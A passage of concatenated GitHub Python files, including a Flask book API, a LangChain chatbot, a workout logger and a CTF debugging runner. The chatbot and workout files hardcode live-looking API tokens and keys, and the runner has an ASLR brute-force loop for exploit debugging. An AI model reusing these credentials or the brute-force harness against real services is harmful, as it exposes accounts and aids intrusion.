ObjectId\nfrom bson import json_util\n\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'books'\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/books'\n\nmongo = PyMongo(app)\n\n@app.route('/books', methods=['POST','GET'])\ndef books():\n books = mongo.db.books_collection\n if request.method == 'POST': \n book = {}\n result = json.loads(request.get_data(as_text=True))\n book['title']=result['title']\n book['author'] = result['author']\n book['price']=result['price']\n output = books.insert(book)\n data = dumps(output)\n elif request.method == 'GET':\n output = books.find()\n data = dumps(output)\n return jsonify({\"Status\": \"OK\", \"data\": data})\n\n@app.route('/books/title/', methods=['GET'])\ndef get_book_by_title(title):\n books = mongo.db.books_collection\n output = books.find_one({'title': title})\n data = dumps(output)\n return jsonify({\"Status\": \"OK\", \"data\": data})\n\n@app.route('/books/author/<author>', methods=['GET'])\ndef get_book_by_author(author):\n books = mongo.db.books_collection\n output = books.find_one({'author': author})\n data = dumps(output)\n return jsonify({\"Status\": \"OK\", \"data\": data})\n\n@app.route('/books/delete/<oid>', methods=['DELETE'])\ndef delete_book(oid):\n books = mongo.db.books_collection\n try:\n output = books.delete_one({'_id': ObjectId(oid)})\n #data = dumps(output,default=json_util.default)\n return jsonify({\"Status\": \"OK\"})\n except e:\n return jsonify({\"Error\":\"404\"})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Agarka/Multi-User-Shared-Shopping-Cart","sub_path":"Product Catalog/src/sample/restful_product.py","file_name":"restful_product.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"8432368133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 5 10:51:14 2018\n\n@author: simon\n\"\"\"\n\nfrom math import ceil\nimport numpy as np\nfrom collections import defaultdict\ndef cube_lst(k):\n # k = power of is the number of digits in the cubes\n # 10**(k-1) <= n**3 < 10**(k)\n n_range = np.arange(ceil(10**((k-1)/3)), ceil(10**((k)/3)))\n cubes = np.power(n_range,3)\n return cubes\n\nassert np.all(np.equal(np.array([125, 216, 343, 512, 729]),cube_lst(3)))\n\ndef dig_freq(num):\n numstr = str(num)\n digs = range(0,10)\n freq = defaultdict(int)\n for char in numstr:\n freq[int(char)]+= 1\n return tuple([freq[x] for x in digs])\n\nassert dig_freq(1112999) == (0,3,1,0,0,0,0,0,0,3)\n\n\ncubelen = 2\nwhile True:\n permutes = defaultdict(int)\n for cube in cube_lst(cubelen):\n permutes[dig_freq(cube)] += 1\n\n if 5 in permutes.values():\n freq5 = []\n poss_ans = []\n for freq in permutes:\n if permutes[freq]==5:\n freq5.append(freq)\n \n for cube in cube_lst(cubelen):\n if dig_freq(cube) in freq5:\n poss_ans.append(int(round(cube**(1/3))))\n \n print(poss_ans)\n ans = min(poss_ans)\n assert permutes[dig_freq(ans**3)]==5\n break\n cubelen += 1\n \nprint(ans**3)","repo_name":"simon-mcmahon/project-euler","sub_path":"progress_2018/prob_62.py","file_name":"prob_62.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17791884192","text":"from langchain.chains import ConversationChain\nfrom langchain.chains.conversation.memory import ConversationBufferWindowMemory\nfrom langchain.prompts import (\n SystemMessagePromptTemplate,\n HumanMessagePromptTemplate,\n 
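    # ChatPromptTemplate and MessagesPlaceholder below are combined with the system/human templates to assemble the conversation prompt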
ChatPromptTemplate,\n MessagesPlaceholder\n)\nimport streamlit as st\nfrom streamlit_chat import message\nfrom utillis import *\nfrom langchain.llms import HuggingFaceHub\nimport os\n\n# Replace 'your_token_value' with your actual Hugging Face API token\nos.environ['HUGGINGFACEHUB_API_TOKEN'] = \"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\"\n\n\nst.subheader(\"Chatbot with Langchain, ChatGPT, Pinecone, and Streamlit\")\n\nif 'responses' not in st.session_state:\n st.session_state['responses'] = [\"How can I assist you?\"]\n\nif 'requests' not in st.session_state:\n st.session_state['requests'] = []\n\nllm = HuggingFaceHub(repo_id=\"google/flan-t5-xxl\", model_kwargs={\"temperature\":0.5, \"max_length\":512})\nif 'buffer_memory' not in st.session_state:\n st.session_state.buffer_memory=ConversationBufferWindowMemory(k=3,return_messages=True)\n\nsystem_msg_template = SystemMessagePromptTemplate.from_template(template=\"\"\"Answer the question as truthfully as possible using the provided context, \nand if the answer is not contained within the text below, say 'I don't know'\"\"\")\n\n\nhuman_msg_template = HumanMessagePromptTemplate.from_template(template=\"{input}\")\n\nprompt_template = ChatPromptTemplate.from_messages([system_msg_template, MessagesPlaceholder(variable_name=\"history\"), human_msg_template])\n\nconversation = ConversationChain(memory=st.session_state.buffer_memory, prompt=prompt_template, llm=llm, verbose=True)\n\n\nresponse_container = st.container()\n# container for text box\ntextcontainer = st.container()\n\nwith textcontainer:\n query = st.text_input(\"Query: \", key=\"input\")\n if query:\n with st.spinner(\"typing\"):\n context=find_match(query)\n response=conversation.predict(input=f\"Context:\\n {context} \\n\\n Query:\\n{query}\")\n st.session_state.requests.append(query)\n st.session_state.responses.append(response)\n\n\nwith response_container:\n if st.session_state['responses']:\n\n for i in range(len(st.session_state['responses'])):\n message(st.session_state['responses'][i],key=str(i))\n if i < len(st.session_state['requests']):\n message(st.session_state[\"requests\"][i], is_user=True,key=str(i)+ '_user')","repo_name":"Jaid844/Chatbot_with_llms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38008078936","text":"# 함수\n# 다중값 리턴\n\n# n까지의 총합과 평균\ndef multi_return(n):\n if n < 0:\n return\n\n tot = 0\n for x in range(n+1):\n tot += x\n avg = tot / n\n return tot, avg\n\n# n 의 총합과 평균\n# n이 음수이면 모두 0을 리턴\nn = -10\nresult = multi_return(n)\nprint('result=', result) # None\nprint(f'0부터 {n}까지의 총합과 평균')\nif result != None:\n print('총합=', result[0])\n print('평균=', result[1])\n\nprint('총합=', result[0] if result != None else '값이 음수여서 게산하지 않음')\nprint('평균=', result[1] if result != None else '값이 음수여서 게산하지 않음')","repo_name":"jinygod/Programming-Language","sub_path":"python/syntax/functions/s07-function-03-return.py","file_name":"s07-function-03-return.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22298231456","text":"import os\nimport xml.etree.ElementTree as ET\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport xmltodict\nimport yaml\n\n\n\ndef parse_xmls_as_dataframe(xmls, stop_on_error=False, logger=None) -> pd.DataFrame:\n \"\"\"Parse a 
bunch of xmls and return a flag dataframe, XML does not have to be present, if it does not exist, no parsing is done.\"\"\"\n df = None\n for xml in xmls:\n if os.path.exists(xml):\n try:\n xml_data: dict = parse_xml_to_dict(xml)\n meta_data = pd.DataFrame(xml_data, index=[0])\n meta_data.columns = [_cleanup(c) for c in meta_data.columns]\n\n if df is None:\n df = meta_data\n else:\n df = df.join(meta_data)\n except Exception as e:\n if logger is not None:\n logger.warn(\"Exception occured while parsing {}: {}\".format(xml, e))\n if not stop_on_error:\n continue\n else:\n raise e\n return df\n\n\ndef parse_xml_to_dict(xml_fp: str, flatten=True) -> dict:\n \"\"\"Parses a XML as an orderd dict. Attributes in the XML will be prefixed with @\"\"\"\n with open(xml_fp) as xml_file:\n data_dict = xmltodict.parse(xml_file.read())\n\n if flatten:\n data_dict = flatten_dict(data_dict)\n return data_dict\n\n\ndef flatten_dict(d: dict, sep=\".\"):\n \"\"\"Recursively flatten a nested dict into a single dict with nested keys becoming Root.Node.Key=XXX, where the separator can be customized\"\"\"\n\n def items():\n for key, value in d.items():\n if isinstance(value, dict):\n for subkey, subvalue in flatten_dict(value).items():\n yield key + sep + subkey, subvalue\n elif isinstance(value, list):\n for i, listval in enumerate(value):\n listkey = \"{}{}\".format(key, i + 1)\n if isinstance(listval, dict):\n for subkey, subvalue in flatten_dict(listval).items():\n yield listkey + sep + subkey, subvalue\n else:\n yield listkey, listval\n else:\n yield key, value\n\n return dict(items())\n\n\ndef substitute(line: str, **extra):\n \"\"\"Performs replacement of all occurences of ${key} in string with `value` passed in as keyword arguments of this function\n i.e. `substitute(line, foo = bar, bo = Rob)` would replace '${foo}' with 'bar' and '${bo}' with 'Rob' in the string line,\n also performs environmental variable substitution\n \"\"\"\n if len(extra) > 0:\n line = deepcopy(line)\n for k, v in extra.items():\n # {{ }} is how we escape the curly braces, the most inner one does the substitution\n line = line.replace(\"${{{}}}\".format(k), str(v))\n return os.path.expandvars(line)\n\n\ndef map_variables(tree: dict, node: dict = None):\n \"\"\"Use DFS to perform variable substitution on values in the config dictionary with other values\n i.e. 
say there's is a list of nested data structure located at key - ['global']['basepaths']\n\n if we want to use the values defined here elsewhere, we can just use $${global.basepaths}, this will be substituted with the appropriate values at\n config['global]['basepaths']\n\n Before mapping:\n {'global': {'something': 'nothing', 'foo': 'bar', 'fizz': [1, 2, 3, 4, 5]},\n 'plugins': {'overview_simple': '${global.fizz}'}}\n\n\n After mapping:\n {'global': {'something': 'nothing', 'foo': 'bar', 'fizz': [1, 2, 3, 4, 5]},\n 'plugins': {'overview_simple': [1, 2, 3, 4, 5]}}\n \"\"\"\n if node is None:\n node = tree\n\n for k, v in node.items():\n if isinstance(v, dict):\n map_variables(tree, v)\n elif isinstance(v, str) and v.startswith(\"$${\") and v.endswith(\"}\"):\n # 2:-1 removes the ${...} and gives us just the ...\n new_v_path = v[3:-1].split(\".\")\n # get the val\n new_val = tree\n while len(new_v_path) > 0:\n new_val = new_val[new_v_path.pop(0)]\n node[k] = new_val\n\n\ndef load_config(config_file: str, map_var=True, **extra) -> dict:\n \"\"\"Load main config file, and override keys specified in the override config file with the new value\n @params:\n config_file : path to a yaml config file\n extra : a dictionary of config values to be substituted, key appears as \"${key}\" in the config file will\n be substituted with the value in the dictionary\n \"\"\"\n config = {}\n with open(config_file, \"r\") as fin:\n try:\n lines = fin.readlines()\n yaml_string = \"\\n\".join([substitute(line, **extra) for line in lines])\n\n config = yaml.load(yaml_string, Loader=yaml.SafeLoader)\n except yaml.YAMLError as exc:\n config = {}\n\n if map_var:\n map_variables(config)\n return config\n\n\ndef get_xml_file_from_folder(path: str, name: str = None):\n \"\"\"Gets first xml file found in folder\"\"\"\n xml_file = [f for f in os.listdir(path) if f.endswith(\".xml\")]\n if name:\n xml_file = [f for f in xml_file if name.lower() in f.lower()]\n xml_file = xml_file[0]\n return xml_file\n\n\ndef map_col_from_xml(path, c, key, func):\n root = get_xml_root(path)\n d = {}\n\n if not root:\n return\n\n l = root.findall(key)\n\n for n, i in enumerate(l, 1):\n v = func(i)\n d[n] = v\n new_c = c.map(d)\n return new_c\n\n\ndef get_xml_root(p):\n if not os.path.exists(p):\n return\n xml_tree = ET.parse(p)\n root = xml_tree.getroot()\n return root\n\n\ndef get_date_time():\n today = datetime.today().strftime(\"%Y_%m_%d_%H_%M_%S\")\n return today\n\n\ndef average_all_columns_by_group(data, group_list, method=\"mean\"):\n \"Group and take average of numeric columns then merge first non-numeric from each group back in\"\n # Drop NAN col and rows\n data.dropna(inplace=True, axis=0, how=\"all\")\n data.dropna(inplace=True, axis=1, how=\"all\")\n # Reset index\n # data = data.reset_index()\n # list of columns to group by and average\n\n if method == \"std\":\n df = data.groupby(by=group_list, as_index=False, sort=True).std()\n if method == \"mean\":\n df = data.groupby(by=group_list, as_index=False, sort=True).mean(numeric_only=True)\n elif method == \"median\":\n df = data.groupby(by=group_list, as_index=False, sort=True).median(numeric_only=True)\n\n # Get list of columns that were dropped during averaged (wrong type)\n init_columns = list(data.columns)\n post_columns = list(df.columns)\n dropped_list = list_diff(init_columns, post_columns)\n\n if dropped_list:\n dropped_list = dropped_list + group_list\n # Get dropped columns as df\n data = data[dropped_list]\n data = data.groupby(by=group_list, as_index=True).nth(0)\n 
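        # the applymap call below collapses any array-valued cells into comma-joined strings so non-numeric columns merge back cleanly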
data = data.applymap(replace_list_with_string)\n if isinstance(data, pd.Series):\n data = data.to_frame().transpose()\n # Merge dropped columns back into averaged data\n df = pd.merge(\n df,\n data,\n how=\"left\",\n left_on=group_list,\n right_index=True,\n )\n return df\n\n\ndef print_time_diff(t1, t2):\n \"\"\"Print difference between two time objects\"\"\"\n seconds = round(t1 - t2, 1)\n hours = round(seconds / 3600, 2)\n print(f\"Time: {hours}h ({seconds}s)\")\n\n\ndef mk_dirs(path):\n dir = Path(path)\n if not dir.exists():\n os.mkdir(dir)\n\n\ndef replace_list_with_string(value):\n if isinstance(value, np.ndarray):\n # value = np.core.defchararray.join(\",\",value)\n value = \",\".join(value)\n return value\n\n\ndef drop_ordered_list_duplicates(l):\n \"\"\"Drop list duplicates (keep order)\"\"\"\n res = [i for n, i in enumerate(l) if i not in l[:n]]\n return res\n\n\ndef drop_unordered_list_duplicates(l):\n \"\"\"Drop list duplicates (don't keep order)\"\"\"\n res = [*set(l)]\n return res\n\n\ndef list_diff(li1, li2):\n li_dif = [i for i in li1 + li2 if i not in li1 or i not in li2]\n return li_dif\n\n\ndef list_intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\n\ndef get_items_containing_substring(items, substrings):\n \"\"\"Get list of items containing any of a list of substrings\"\"\"\n substrings = [str(s) for s in substrings]\n items = [i for i in items if any(s in i for s in substrings)]\n return items\n\n\ndef get_root():\n \"\"\"Get path to root dir\"\"\"\n path = os.path.dirname(os.path.realpath(\"__file__\"))\n return path\n\ndef open_csv_chunks(path,**kwargs):\n \"\"\"Open csv using pd.read_csv with chunking\"\"\"\n df_iter = pd.read_csv(path,low_memory=False,chunksize=1000,**kwargs)\n df = pd.concat(df_iter)\n return df","repo_name":"cjgarcia1984/Solitaire","sub_path":"utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":8932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21690810538","text":"#!/usr/bin/python\n\nimport sys, os\nimport time\nimport subprocess\n\"\"\"\n\nThe code here is too messy, since it is not modulized.\n\nNow I explain why the tool is used. The tool will provide advantageous\ndebugging assistence with:\n a) customizable init gdb script. With the functionality, I can now\n have my variable to be the base of the main executable, libc, heap,\n etc.\n b) customizable execute method, aka configuration of libc and some\n ASLR pattern. You can change libc real time (not much attractive right?)\n and you can make the connection to have some trait with ASLR (such\n as making libc address to be 0x7fxxxx000000, which is in 1/4096\n chance by natural). When you socat this script, you can configure\n it to bruteforce about the executable, and filter out the \"good\"\n memory layout and make it to be the very service that take effect\n (although the default script here require your exploit to wait before\n good ASLR is present, after which the exp can send payload)\n The ASLR related code is commented by me, but you can use it under\n extreme cases.\n\n\"\"\"\n\n# The most often modified variables\n\n# bruteforce arguments, you may set it to lower value if your PC detests.\n\nMAX_TRIAL = 65536\nMAX_CONCURRENT = 256\n\n# On graphic linux if GDB_POPWINDOW is set, every connection will pop a\n# terminal for one gdb\n# If you use ssh to debug, you can set it to be false, in order to make\n# gdb appear on the very terminal as socat. 
(but a sad story, you cannot\n# send interrupt to gdb using ^C in this case)\n\nGDB_POPWINDOW = True #False\n\n# If the program runs with a heap (heap is initiated before first input),\n# check it to be true, otherwise, false.\n\n# However it now only affect the module for bruteforcing aslr.\n\nhasHeap = True\nhasLibc = True\n\n# x86-64 or x86-32 deprecated\n\n#is64 = False\n\n# fuzzing mode or exploiting mode\n# fuzzing mode will stop debugger on discovering heap vulnerability\n# although it might be not so useful as we have professional fuzzer\n\nFuzzing = False\n\n# argv of the server\n\nargv = ['./overwatch']\n\n# if you have your custom libc in the same directory, this config is useful\n# else, edit them to your preference\n\ncwd = os.getcwd() + '/'\n\nfilename = argv[0]\n\nlibc = cwd + 'libc.so.6'\n\nenv = {'LD_PRELOAD': libc, 'PATH': '/bin:/usr/bin'}\n\ncustom_exec = ''\n\n# ###### Run our real program, or if you like an ASLR-filtered version\n\n#p = subprocess.Popen(argv, env=env)\np = subprocess.Popen(argv)\n\n# below are generator for a good pattern of ASLR. You can also use the\n# getaslrs function below!\n'''\nfor i in range(MAX_TRIAL):\n if i % 16 == 0: print >> sys.stderr, 'Current attempt: %d' % i\n ps = []\n for j in range(MAX_CONCURRENT):\n ps.append(subprocess.Popen(argv, env=env))\n lucky_id = -1\n for j in range(MAX_CONCURRENT):\n while True:\n with open('/proc/%d/maps' % ps[j].pid, 'r') as f:\n aslr = f.readlines()\n libc_line = [_ for _ in aslr if 'libc.so' in _]\n if len(libc_line) > 0:\n break\n print >> sys.stderr, 'Missed target for %d, %d' % (i, j)\n libc_addr = int(libc_line[0].split()[0].split('-')[0], 16)\n #print >>sys.stderr, hex(libc_addr)\n if libc_addr == 0xf7558000:\n lucky_id = j\n break\n if lucky_id == -1:\n for p in ps:\n p.kill()\n del ps\n else:\n for j in range(MAX_CONCURRENT):\n if j != lucky_id:\n ps[j].kill()\n p = ps[lucky_id]\n break\n'''\n\n# end of <Run our real program>\n\n# ###### Attach gdb (assume peda + libheap + glibc source are ready!!)\n\ngdb_autoexec_filename = '.gdb_autoexec_script'\n\nautoexec = '''\nb abort\n'''\n\ndef extract_addr(s):\n return int(s.split()[0].split('-')[0], 16)\n\n\ndef getaslr(aslr, signiture):\n filter_arr = [_ for _ in aslr if signiture in _]\n if len(filter_arr) == 0:\n return 0\n return extract_addr(filter_arr[0])\n\n\ndef getaslrs(p, retry=True, hasHeap=True, hasLibc=True):\n # main, stack, vdso, libc, heap\n hases = [True, True, True, hasLibc, hasHeap]\n sigs = [argv[0][2:], '[stack]', '[vdso]', 'libc', '[heap]']\n while True:\n with open('/proc/%d/maps' % p.pid, 'r') as f:\n aslr = f.readlines()\n addrs = []\n for i in range(len(sigs)):\n s = sigs[i]\n addr = getaslr(aslr, s)\n if not addr and hases[i]:\n print >> sys.stderr, 'Failed to get aslr of %s' % s\n if retry:\n print >> sys.stderr, 'Retrying.'\n time.sleep(1e-1)\n break\n else:\n return None\n else:\n addrs.append(addr)\n if len(addrs) == len(sigs):\n return addrs\n\n\n#aslr = getaslrs(p, hasHeap=hasHeap, hasLibc=hasLibc)\n\nautoexec += custom_exec\n\nwith open(cwd + gdb_autoexec_filename, 'w') as f:\n f.write(autoexec + '\\n')\n\ngdb_term_argv = [\n '/usr/bin/x-terminal-emulator', '-e', 'gdb-multiarch -q \"%s\" %d -x \"%s\"' %\n (cwd + filename, p.pid, cwd + gdb_autoexec_filename)\n]\n\nif GDB_POPWINDOW:\n gdb_p = subprocess.Popen(\n gdb_term_argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\nelse:\n gdb_p = subprocess.Popen(\n ['/bin/sh', '-c'] + gdb_term_argv[2:], stdin=2, stdout=2)\n\n# end of <Attach gdb>\n\n# following will preventing 
the ghost connection of the program consuming the cpu\n\n#effective_p = subprocess.Popen(['nc', '0', '9345'])\n\nimport signal\nimport sys\n\n\ndef signal_handler(signal, frame):\n print >> sys.stderr, 'Python killed'\n p.kill()\n exit(-1)\n\n\nsignal.signal(signal.SIGPIPE, signal_handler)\nsignal.signal(signal.SIGTERM, signal_handler)\nsignal.signal(signal.SIGINT, signal_handler)\n\n# wait for the program to die\n\np.wait()\n","repo_name":"ThinerDAS/ctf-util","sub_path":"runner/plain_runner.py","file_name":"plain_runner.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41601017637","text":"import pickle\nimport numpy as np\nimport torch\nimport argparse, logging\n\ndef main(args):\n # save_dir = '/home/think/checkpoints/multi30k/en-de/inverseKD_res_m_l2_1enc'\n syn_f = open(args.save_dir + f'/{args.gen_subset}SynLocal_v.pickle', 'rb')\n org_f = open(args.save_dir + f'/{args.gen_subset}OrgLocal_v.pickle', 'rb')\n\n # load numpy from .pkl file\n syn_out = []\n org_out = []\n while True:\n try:\n syn_i = pickle.load(syn_f)\n org_i = pickle.load(org_f)\n syn_out.append(syn_i)\n org_out.append(org_i)\n except EOFError:\n break\n\n # numpy array\n syn_arr = np.stack(syn_out, axis=0)\n org_arr = np.stack(org_out, axis=0)\n\n # torch tensor\n syn_mat = torch.from_numpy(syn_arr)\n org_mat = torch.from_numpy(org_arr)\n\n # consine similarity\n cos_sim = torch.mm(syn_mat, org_mat.T) / (torch.norm(syn_mat) * torch.norm(org_mat))\n _, indices = cos_sim.topk(k=args.topk, dim=1, largest=True, sorted=True) # sorted by column\n batch = cos_sim.shape[0]\n indexs = torch.arange(0, batch).view(-1, 1).repeat(1, args.topk)\n mask = (indices == indexs)\n rk_score = mask.sum(dim=1).sum(dim=0) / batch\n print(rk_score)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"visual grounding\")\n parser.add_argument(\"--topk\", type=int, metavar='N',\n help=\"top k neighborhood viusal features\")\n parser.add_argument(\"--save-dir\", metavar=\"FP\", default=None,\n help=\"Path to the directory containing pickle files\")\n parser.add_argument('--gen-subset', default='test', metavar='SPLIT',\n help='data subset to generate (train, valid, test)')\n args = parser.parse_args()\n\n print(f'####{args.gen_subset}####')\n print(f'R@{args.topk} Score:', end=\" \")\n main(args)\n\n","repo_name":"pengr/IKD-mmt","sub_path":"scripts/visual_grounding.py","file_name":"visual_grounding.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"71225581240","text":"import requests\r\nimport datetime as dt\r\n\r\n# Nutritionix Details\r\nAPI_KEY = \"991621dcaf81d6f452d925d5b3959a17\"\r\nAPP_ID = \"0d36815d\"\r\nURL = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\r\n\r\nX_APP_ID = {\r\n \"x-app-id\": APP_ID,\r\n \"x-app-key\": API_KEY,\r\n \"x-remote-user-id\": \"0\"\r\n}\r\n\r\nbody = {\r\n \"query\": input(\"Tell me what exercise you did today : \"),\r\n \"gender\": 'male'\r\n\r\n}\r\nresponse = requests.post(url=URL, json=body, headers=X_APP_ID)\r\nexercise_json = response.json()['exercises']\r\n# print(exercise_json, len(exercise_json))\r\n\r\n# (name of event, num_of)calories, time)\r\nactivity_list = [{\"date\": dt.datetime.now().strftime(\"%d/%m/%Y\"), \"time\": dt.datetime.now().strftime(\"%X\"),\r\n \"exercise\": i['name'], \"duration\": i['duration_min'], \"calories\": i['nf_calories']} for i in 
exercise_json]\r\n\r\nprint(\"Data succesfully acquired and listed\")\r\n\r\n# Working with the sheety API\r\n\r\nsheety_API = \"https://api.sheety.co/6058f50226857081a997dc586d44aa18/workoutTracker/workouts\"\r\n\r\n\r\nfor i in activity_list:\r\n body = {\r\n \"workout\": i\r\n }\r\n response_sheety = requests.post(url=sheety_API, json=body)\r\n print(response_sheety.text)\r\n\r\n\r\n","repo_name":"RhythmBear/100-DAYS-OF-CODE","sub_path":"Day-38-Exercise-Tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70397311162","text":"import ast\nfrom matplotlib.colors import LinearSegmentedColormap\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\n\ndef cmap_fromLut(fname): # converts a .lut file given its path to a LinearSegmentedColormap\n # locate control points number for each color [blue,green,red] and store data\n control_points = []\n data = []\n with open(fname, \"r\") as f:\n for line in f:\n data.append(line.strip())\n if 'Number of Control Points' in line:\n split = line.split(':')\n control_points.append(int(split[1].strip()))\n # locate the\n location = []\n n=0\n for i in data:\n if 'Info' in i:\n location.append(n)\n n+=1\n # separate and store the control points\n points_B = data[location[0]+2:location[0]+2+control_points[0]]\n points_G = data[location[1]+2:location[1]+2+control_points[1]]\n points_R = data[location[2]+2:location[2]+2+control_points[2]]\n\n def convert(list): # to convert from string to array format\n A = []\n for i in list:\n A.append(ast.literal_eval(i.split(':')[1].strip()))\n A = np.array(A)\n sorted_indices = np.argsort(A[:,0])\n arr = A[sorted_indices]\n return arr\n\n points_B = convert(points_B)\n points_G = convert(points_G)\n points_R = convert(points_R)\n #invert the color map to match the original\n points_B[:,1] = 255-points_B[:,1]\n points_G[:,1] = 255-points_G[:,1]\n points_R[:,1] = 255-points_R[:,1]\n\n # Create the colormap\n cmap_lut = LinearSegmentedColormap('lut_colormap', {\n 'red': [(x/255.0, y/255.0, y/255.0) for x, y in points_R],\n 'green': [(x/255.0, y/255.0, y/255.0) for x, y in points_G],\n 'blue': [(x/255.0, y/255.0, y/255.0) for x, y in points_B]\n })\n return cmap_lut\n\n\ndef export_colormap(colormap, filename):\n cmaplist = [colormap(i) for i in range(0,colormap.N,4)]\n colormap = matplotlib.colors.LinearSegmentedColormap.from_list('mcm',cmaplist, colormap.N/4)\n\n with open(filename, 'w') as file:\n file.write(\"WSxM file copyright UAM\\n\")\n file.write(\"New Format Palette. 
2001\\n\")\n file.write(\"Image header size: 1143\\n\\n\")\n \n def write_color_points(color_name, color_points):\n file.write(f\"[{color_name} Info]\\n\")\n for i, point in enumerate(color_points):\n file.write(f\" Control Point {i}: ({int(point[0]*255)} , {255-int(point[1]*255)})\\n\")\n file.write(f\" Number of Control Points: {len(color_points)}\\n\\n\")\n \n write_color_points(\"Blue\", colormap._segmentdata['blue'])\n write_color_points(\"Green\", colormap._segmentdata['green'])\n write_color_points(\"Red\", colormap._segmentdata['red'])\n \n file.write(\"[Palette Generation Settings]\\n\")\n file.write(\" Derivate Mode for the last blue Point: Automatic\\n\")\n file.write(\" Derivate Mode for the last green Point: Automatic\\n\")\n file.write(\" Derivate Mode for the last red Point: Automatic\\n\")\n file.write(\" Is there a particular palette index colored?: No\\n\")\n file.write(\" Smooth Blue: No\\n\")\n file.write(\" Smooth Green: No\\n\")\n file.write(\" Smooth Red: No\\n\\n\")\n \n file.write(\"[Header end]\")\n\n","repo_name":"stefanotriv/cmap_wsxmTopy","sub_path":"src/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25375368034","text":"import xlrd\nimport pandas as pd\n\npd.options.mode.chained_assignment = None # default='warn'\n\ndef readEAExcel(ea_file: str) -> pd.DataFrame:\n \"\"\"Loads the data from an excel spreadsheet that is exported from an Engineers Australia myCPD Record.\n\n This imports cpd data from an excel spreadsheet that uses from the Engineers Australia myCPD format. The data cleaned and put into a pandas.DataFrame which is returned. The function insertDataframe() from this same module needs to be called to write the contents of the dataframe in to the current CPEngLog database. \n \n Arguments:\n ea_file -- the path the to the myCPD Record xlsx file, including file extension.\n \n Returns:\n None if error,otherwise a pandas.DataFrame object containing the imported data.\n \"\"\"\n raw_data = pd.read_excel(ea_file, sheet_name=0, nrows=1)\n headerText = raw_data.columns[0]\n if headerText.find('CPD ACTIVITY REPORT') >= 0:\n raw_data = pd.read_excel(ea_file, sheet_name=0, skiprows=[0])\n new_data = raw_data.iloc[::2, :] #Each observation is split over two rows. 
Get the odd rows\n evenrows = raw_data.iloc[1::2, :] #Get the even rows\n new_data['Learning outcome'] = evenrows['END DATE'].values\n new_data.drop(columns=['REF NO', 'Unnamed: 14'], inplace=True)\n new_data.columns = ['Type', 'Start date', 'End date', 'Activity', 'Topic','Provider', 'EA Division', 'Location', 'Hours: total', 'Hours: risk management', 'Hours: business and management', 'Hours: area of practice', 'Notes', 'Learning outcome']\n new_data['Start date'] = pd.to_datetime(new_data['Start date'])\n new_data['End date'] = pd.to_datetime(new_data['End date'])\n new_data['Type'] = new_data['Type'].map(lambda x: x.lstrip('Type '))\n new_data.reset_index(drop=True, inplace=True)\n return new_data\n else:\n return None","repo_name":"PlatypusTechnical/CPEngLog","sub_path":"cpenglog/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5743686320","text":"#!/usr/bin/env python3\nimport re\nimport subprocess as sp\nimport shlex\nimport sys\nimport time\nimport logging\nimport os\n\nlogger = logging.getLogger(\"__name__\")\nlogger.setLevel(40)\n\nSTATUS_ATTEMPTS = 20\n\njobid = int(sys.argv[1])\njob_status = \"running\"\nusername = os.getlogin()\ncell = os.getenv('SGE_CELL')\nsge_root = os.getenv('SGE_ROOT')\ndef checkjob(jobid):\n results = sp.check_output(['tail', '-10000', f'{sge_root}/{cell}/common/accounting']).decode().split('\\n')\n for line in results:\n l = line.split(':')\n if len(l) == 1: \n break \n if l[5] == str(jobid) and l[3] == username:\n if re.search(r'^snakejob\\.', l[4]):\n return int(l[12])\n raise sp.CalledProcessError(1, \"check jobs\")\n\n# WARNING this currently has no support for task array jobs\n\nfor i in range(STATUS_ATTEMPTS):\n # first try qstat to see if job is running\n # we can use `qstat -s pr -u \"*\"` to check for all running and pending jobs\n try:\n qstat_res = sp.check_output(shlex.split(f\"qstat -s pr\")).decode().strip()\n\n # skip the header using [2:]\n res = {\n int(x.split()[0]) : x.split()[4] for x in qstat_res.splitlines()[2:]\n }\n\n # job is in an unspecified error state\n if \"E\" in res[jobid]:\n job_status = \"failed\"\n break\n\n job_status = \"running\"\n break\n\n except sp.CalledProcessError as e:\n logger.error(\"qstat process error\")\n logger.error(e)\n except KeyError as e:\n # if the job has finished it won't appear in qstat and we should check qacct\n # this will also provide the exit status (0 on success, 128 + exit_status on fail)\n # Try getting job with scontrol instead in case sacct is misconfigured\n try:\n # qacct_res = sp.check_output(shlex.split(f\"qacct -j {jobid} -o {username}\"))\n\n exit_code = checkjob(jobid)\n if exit_code == 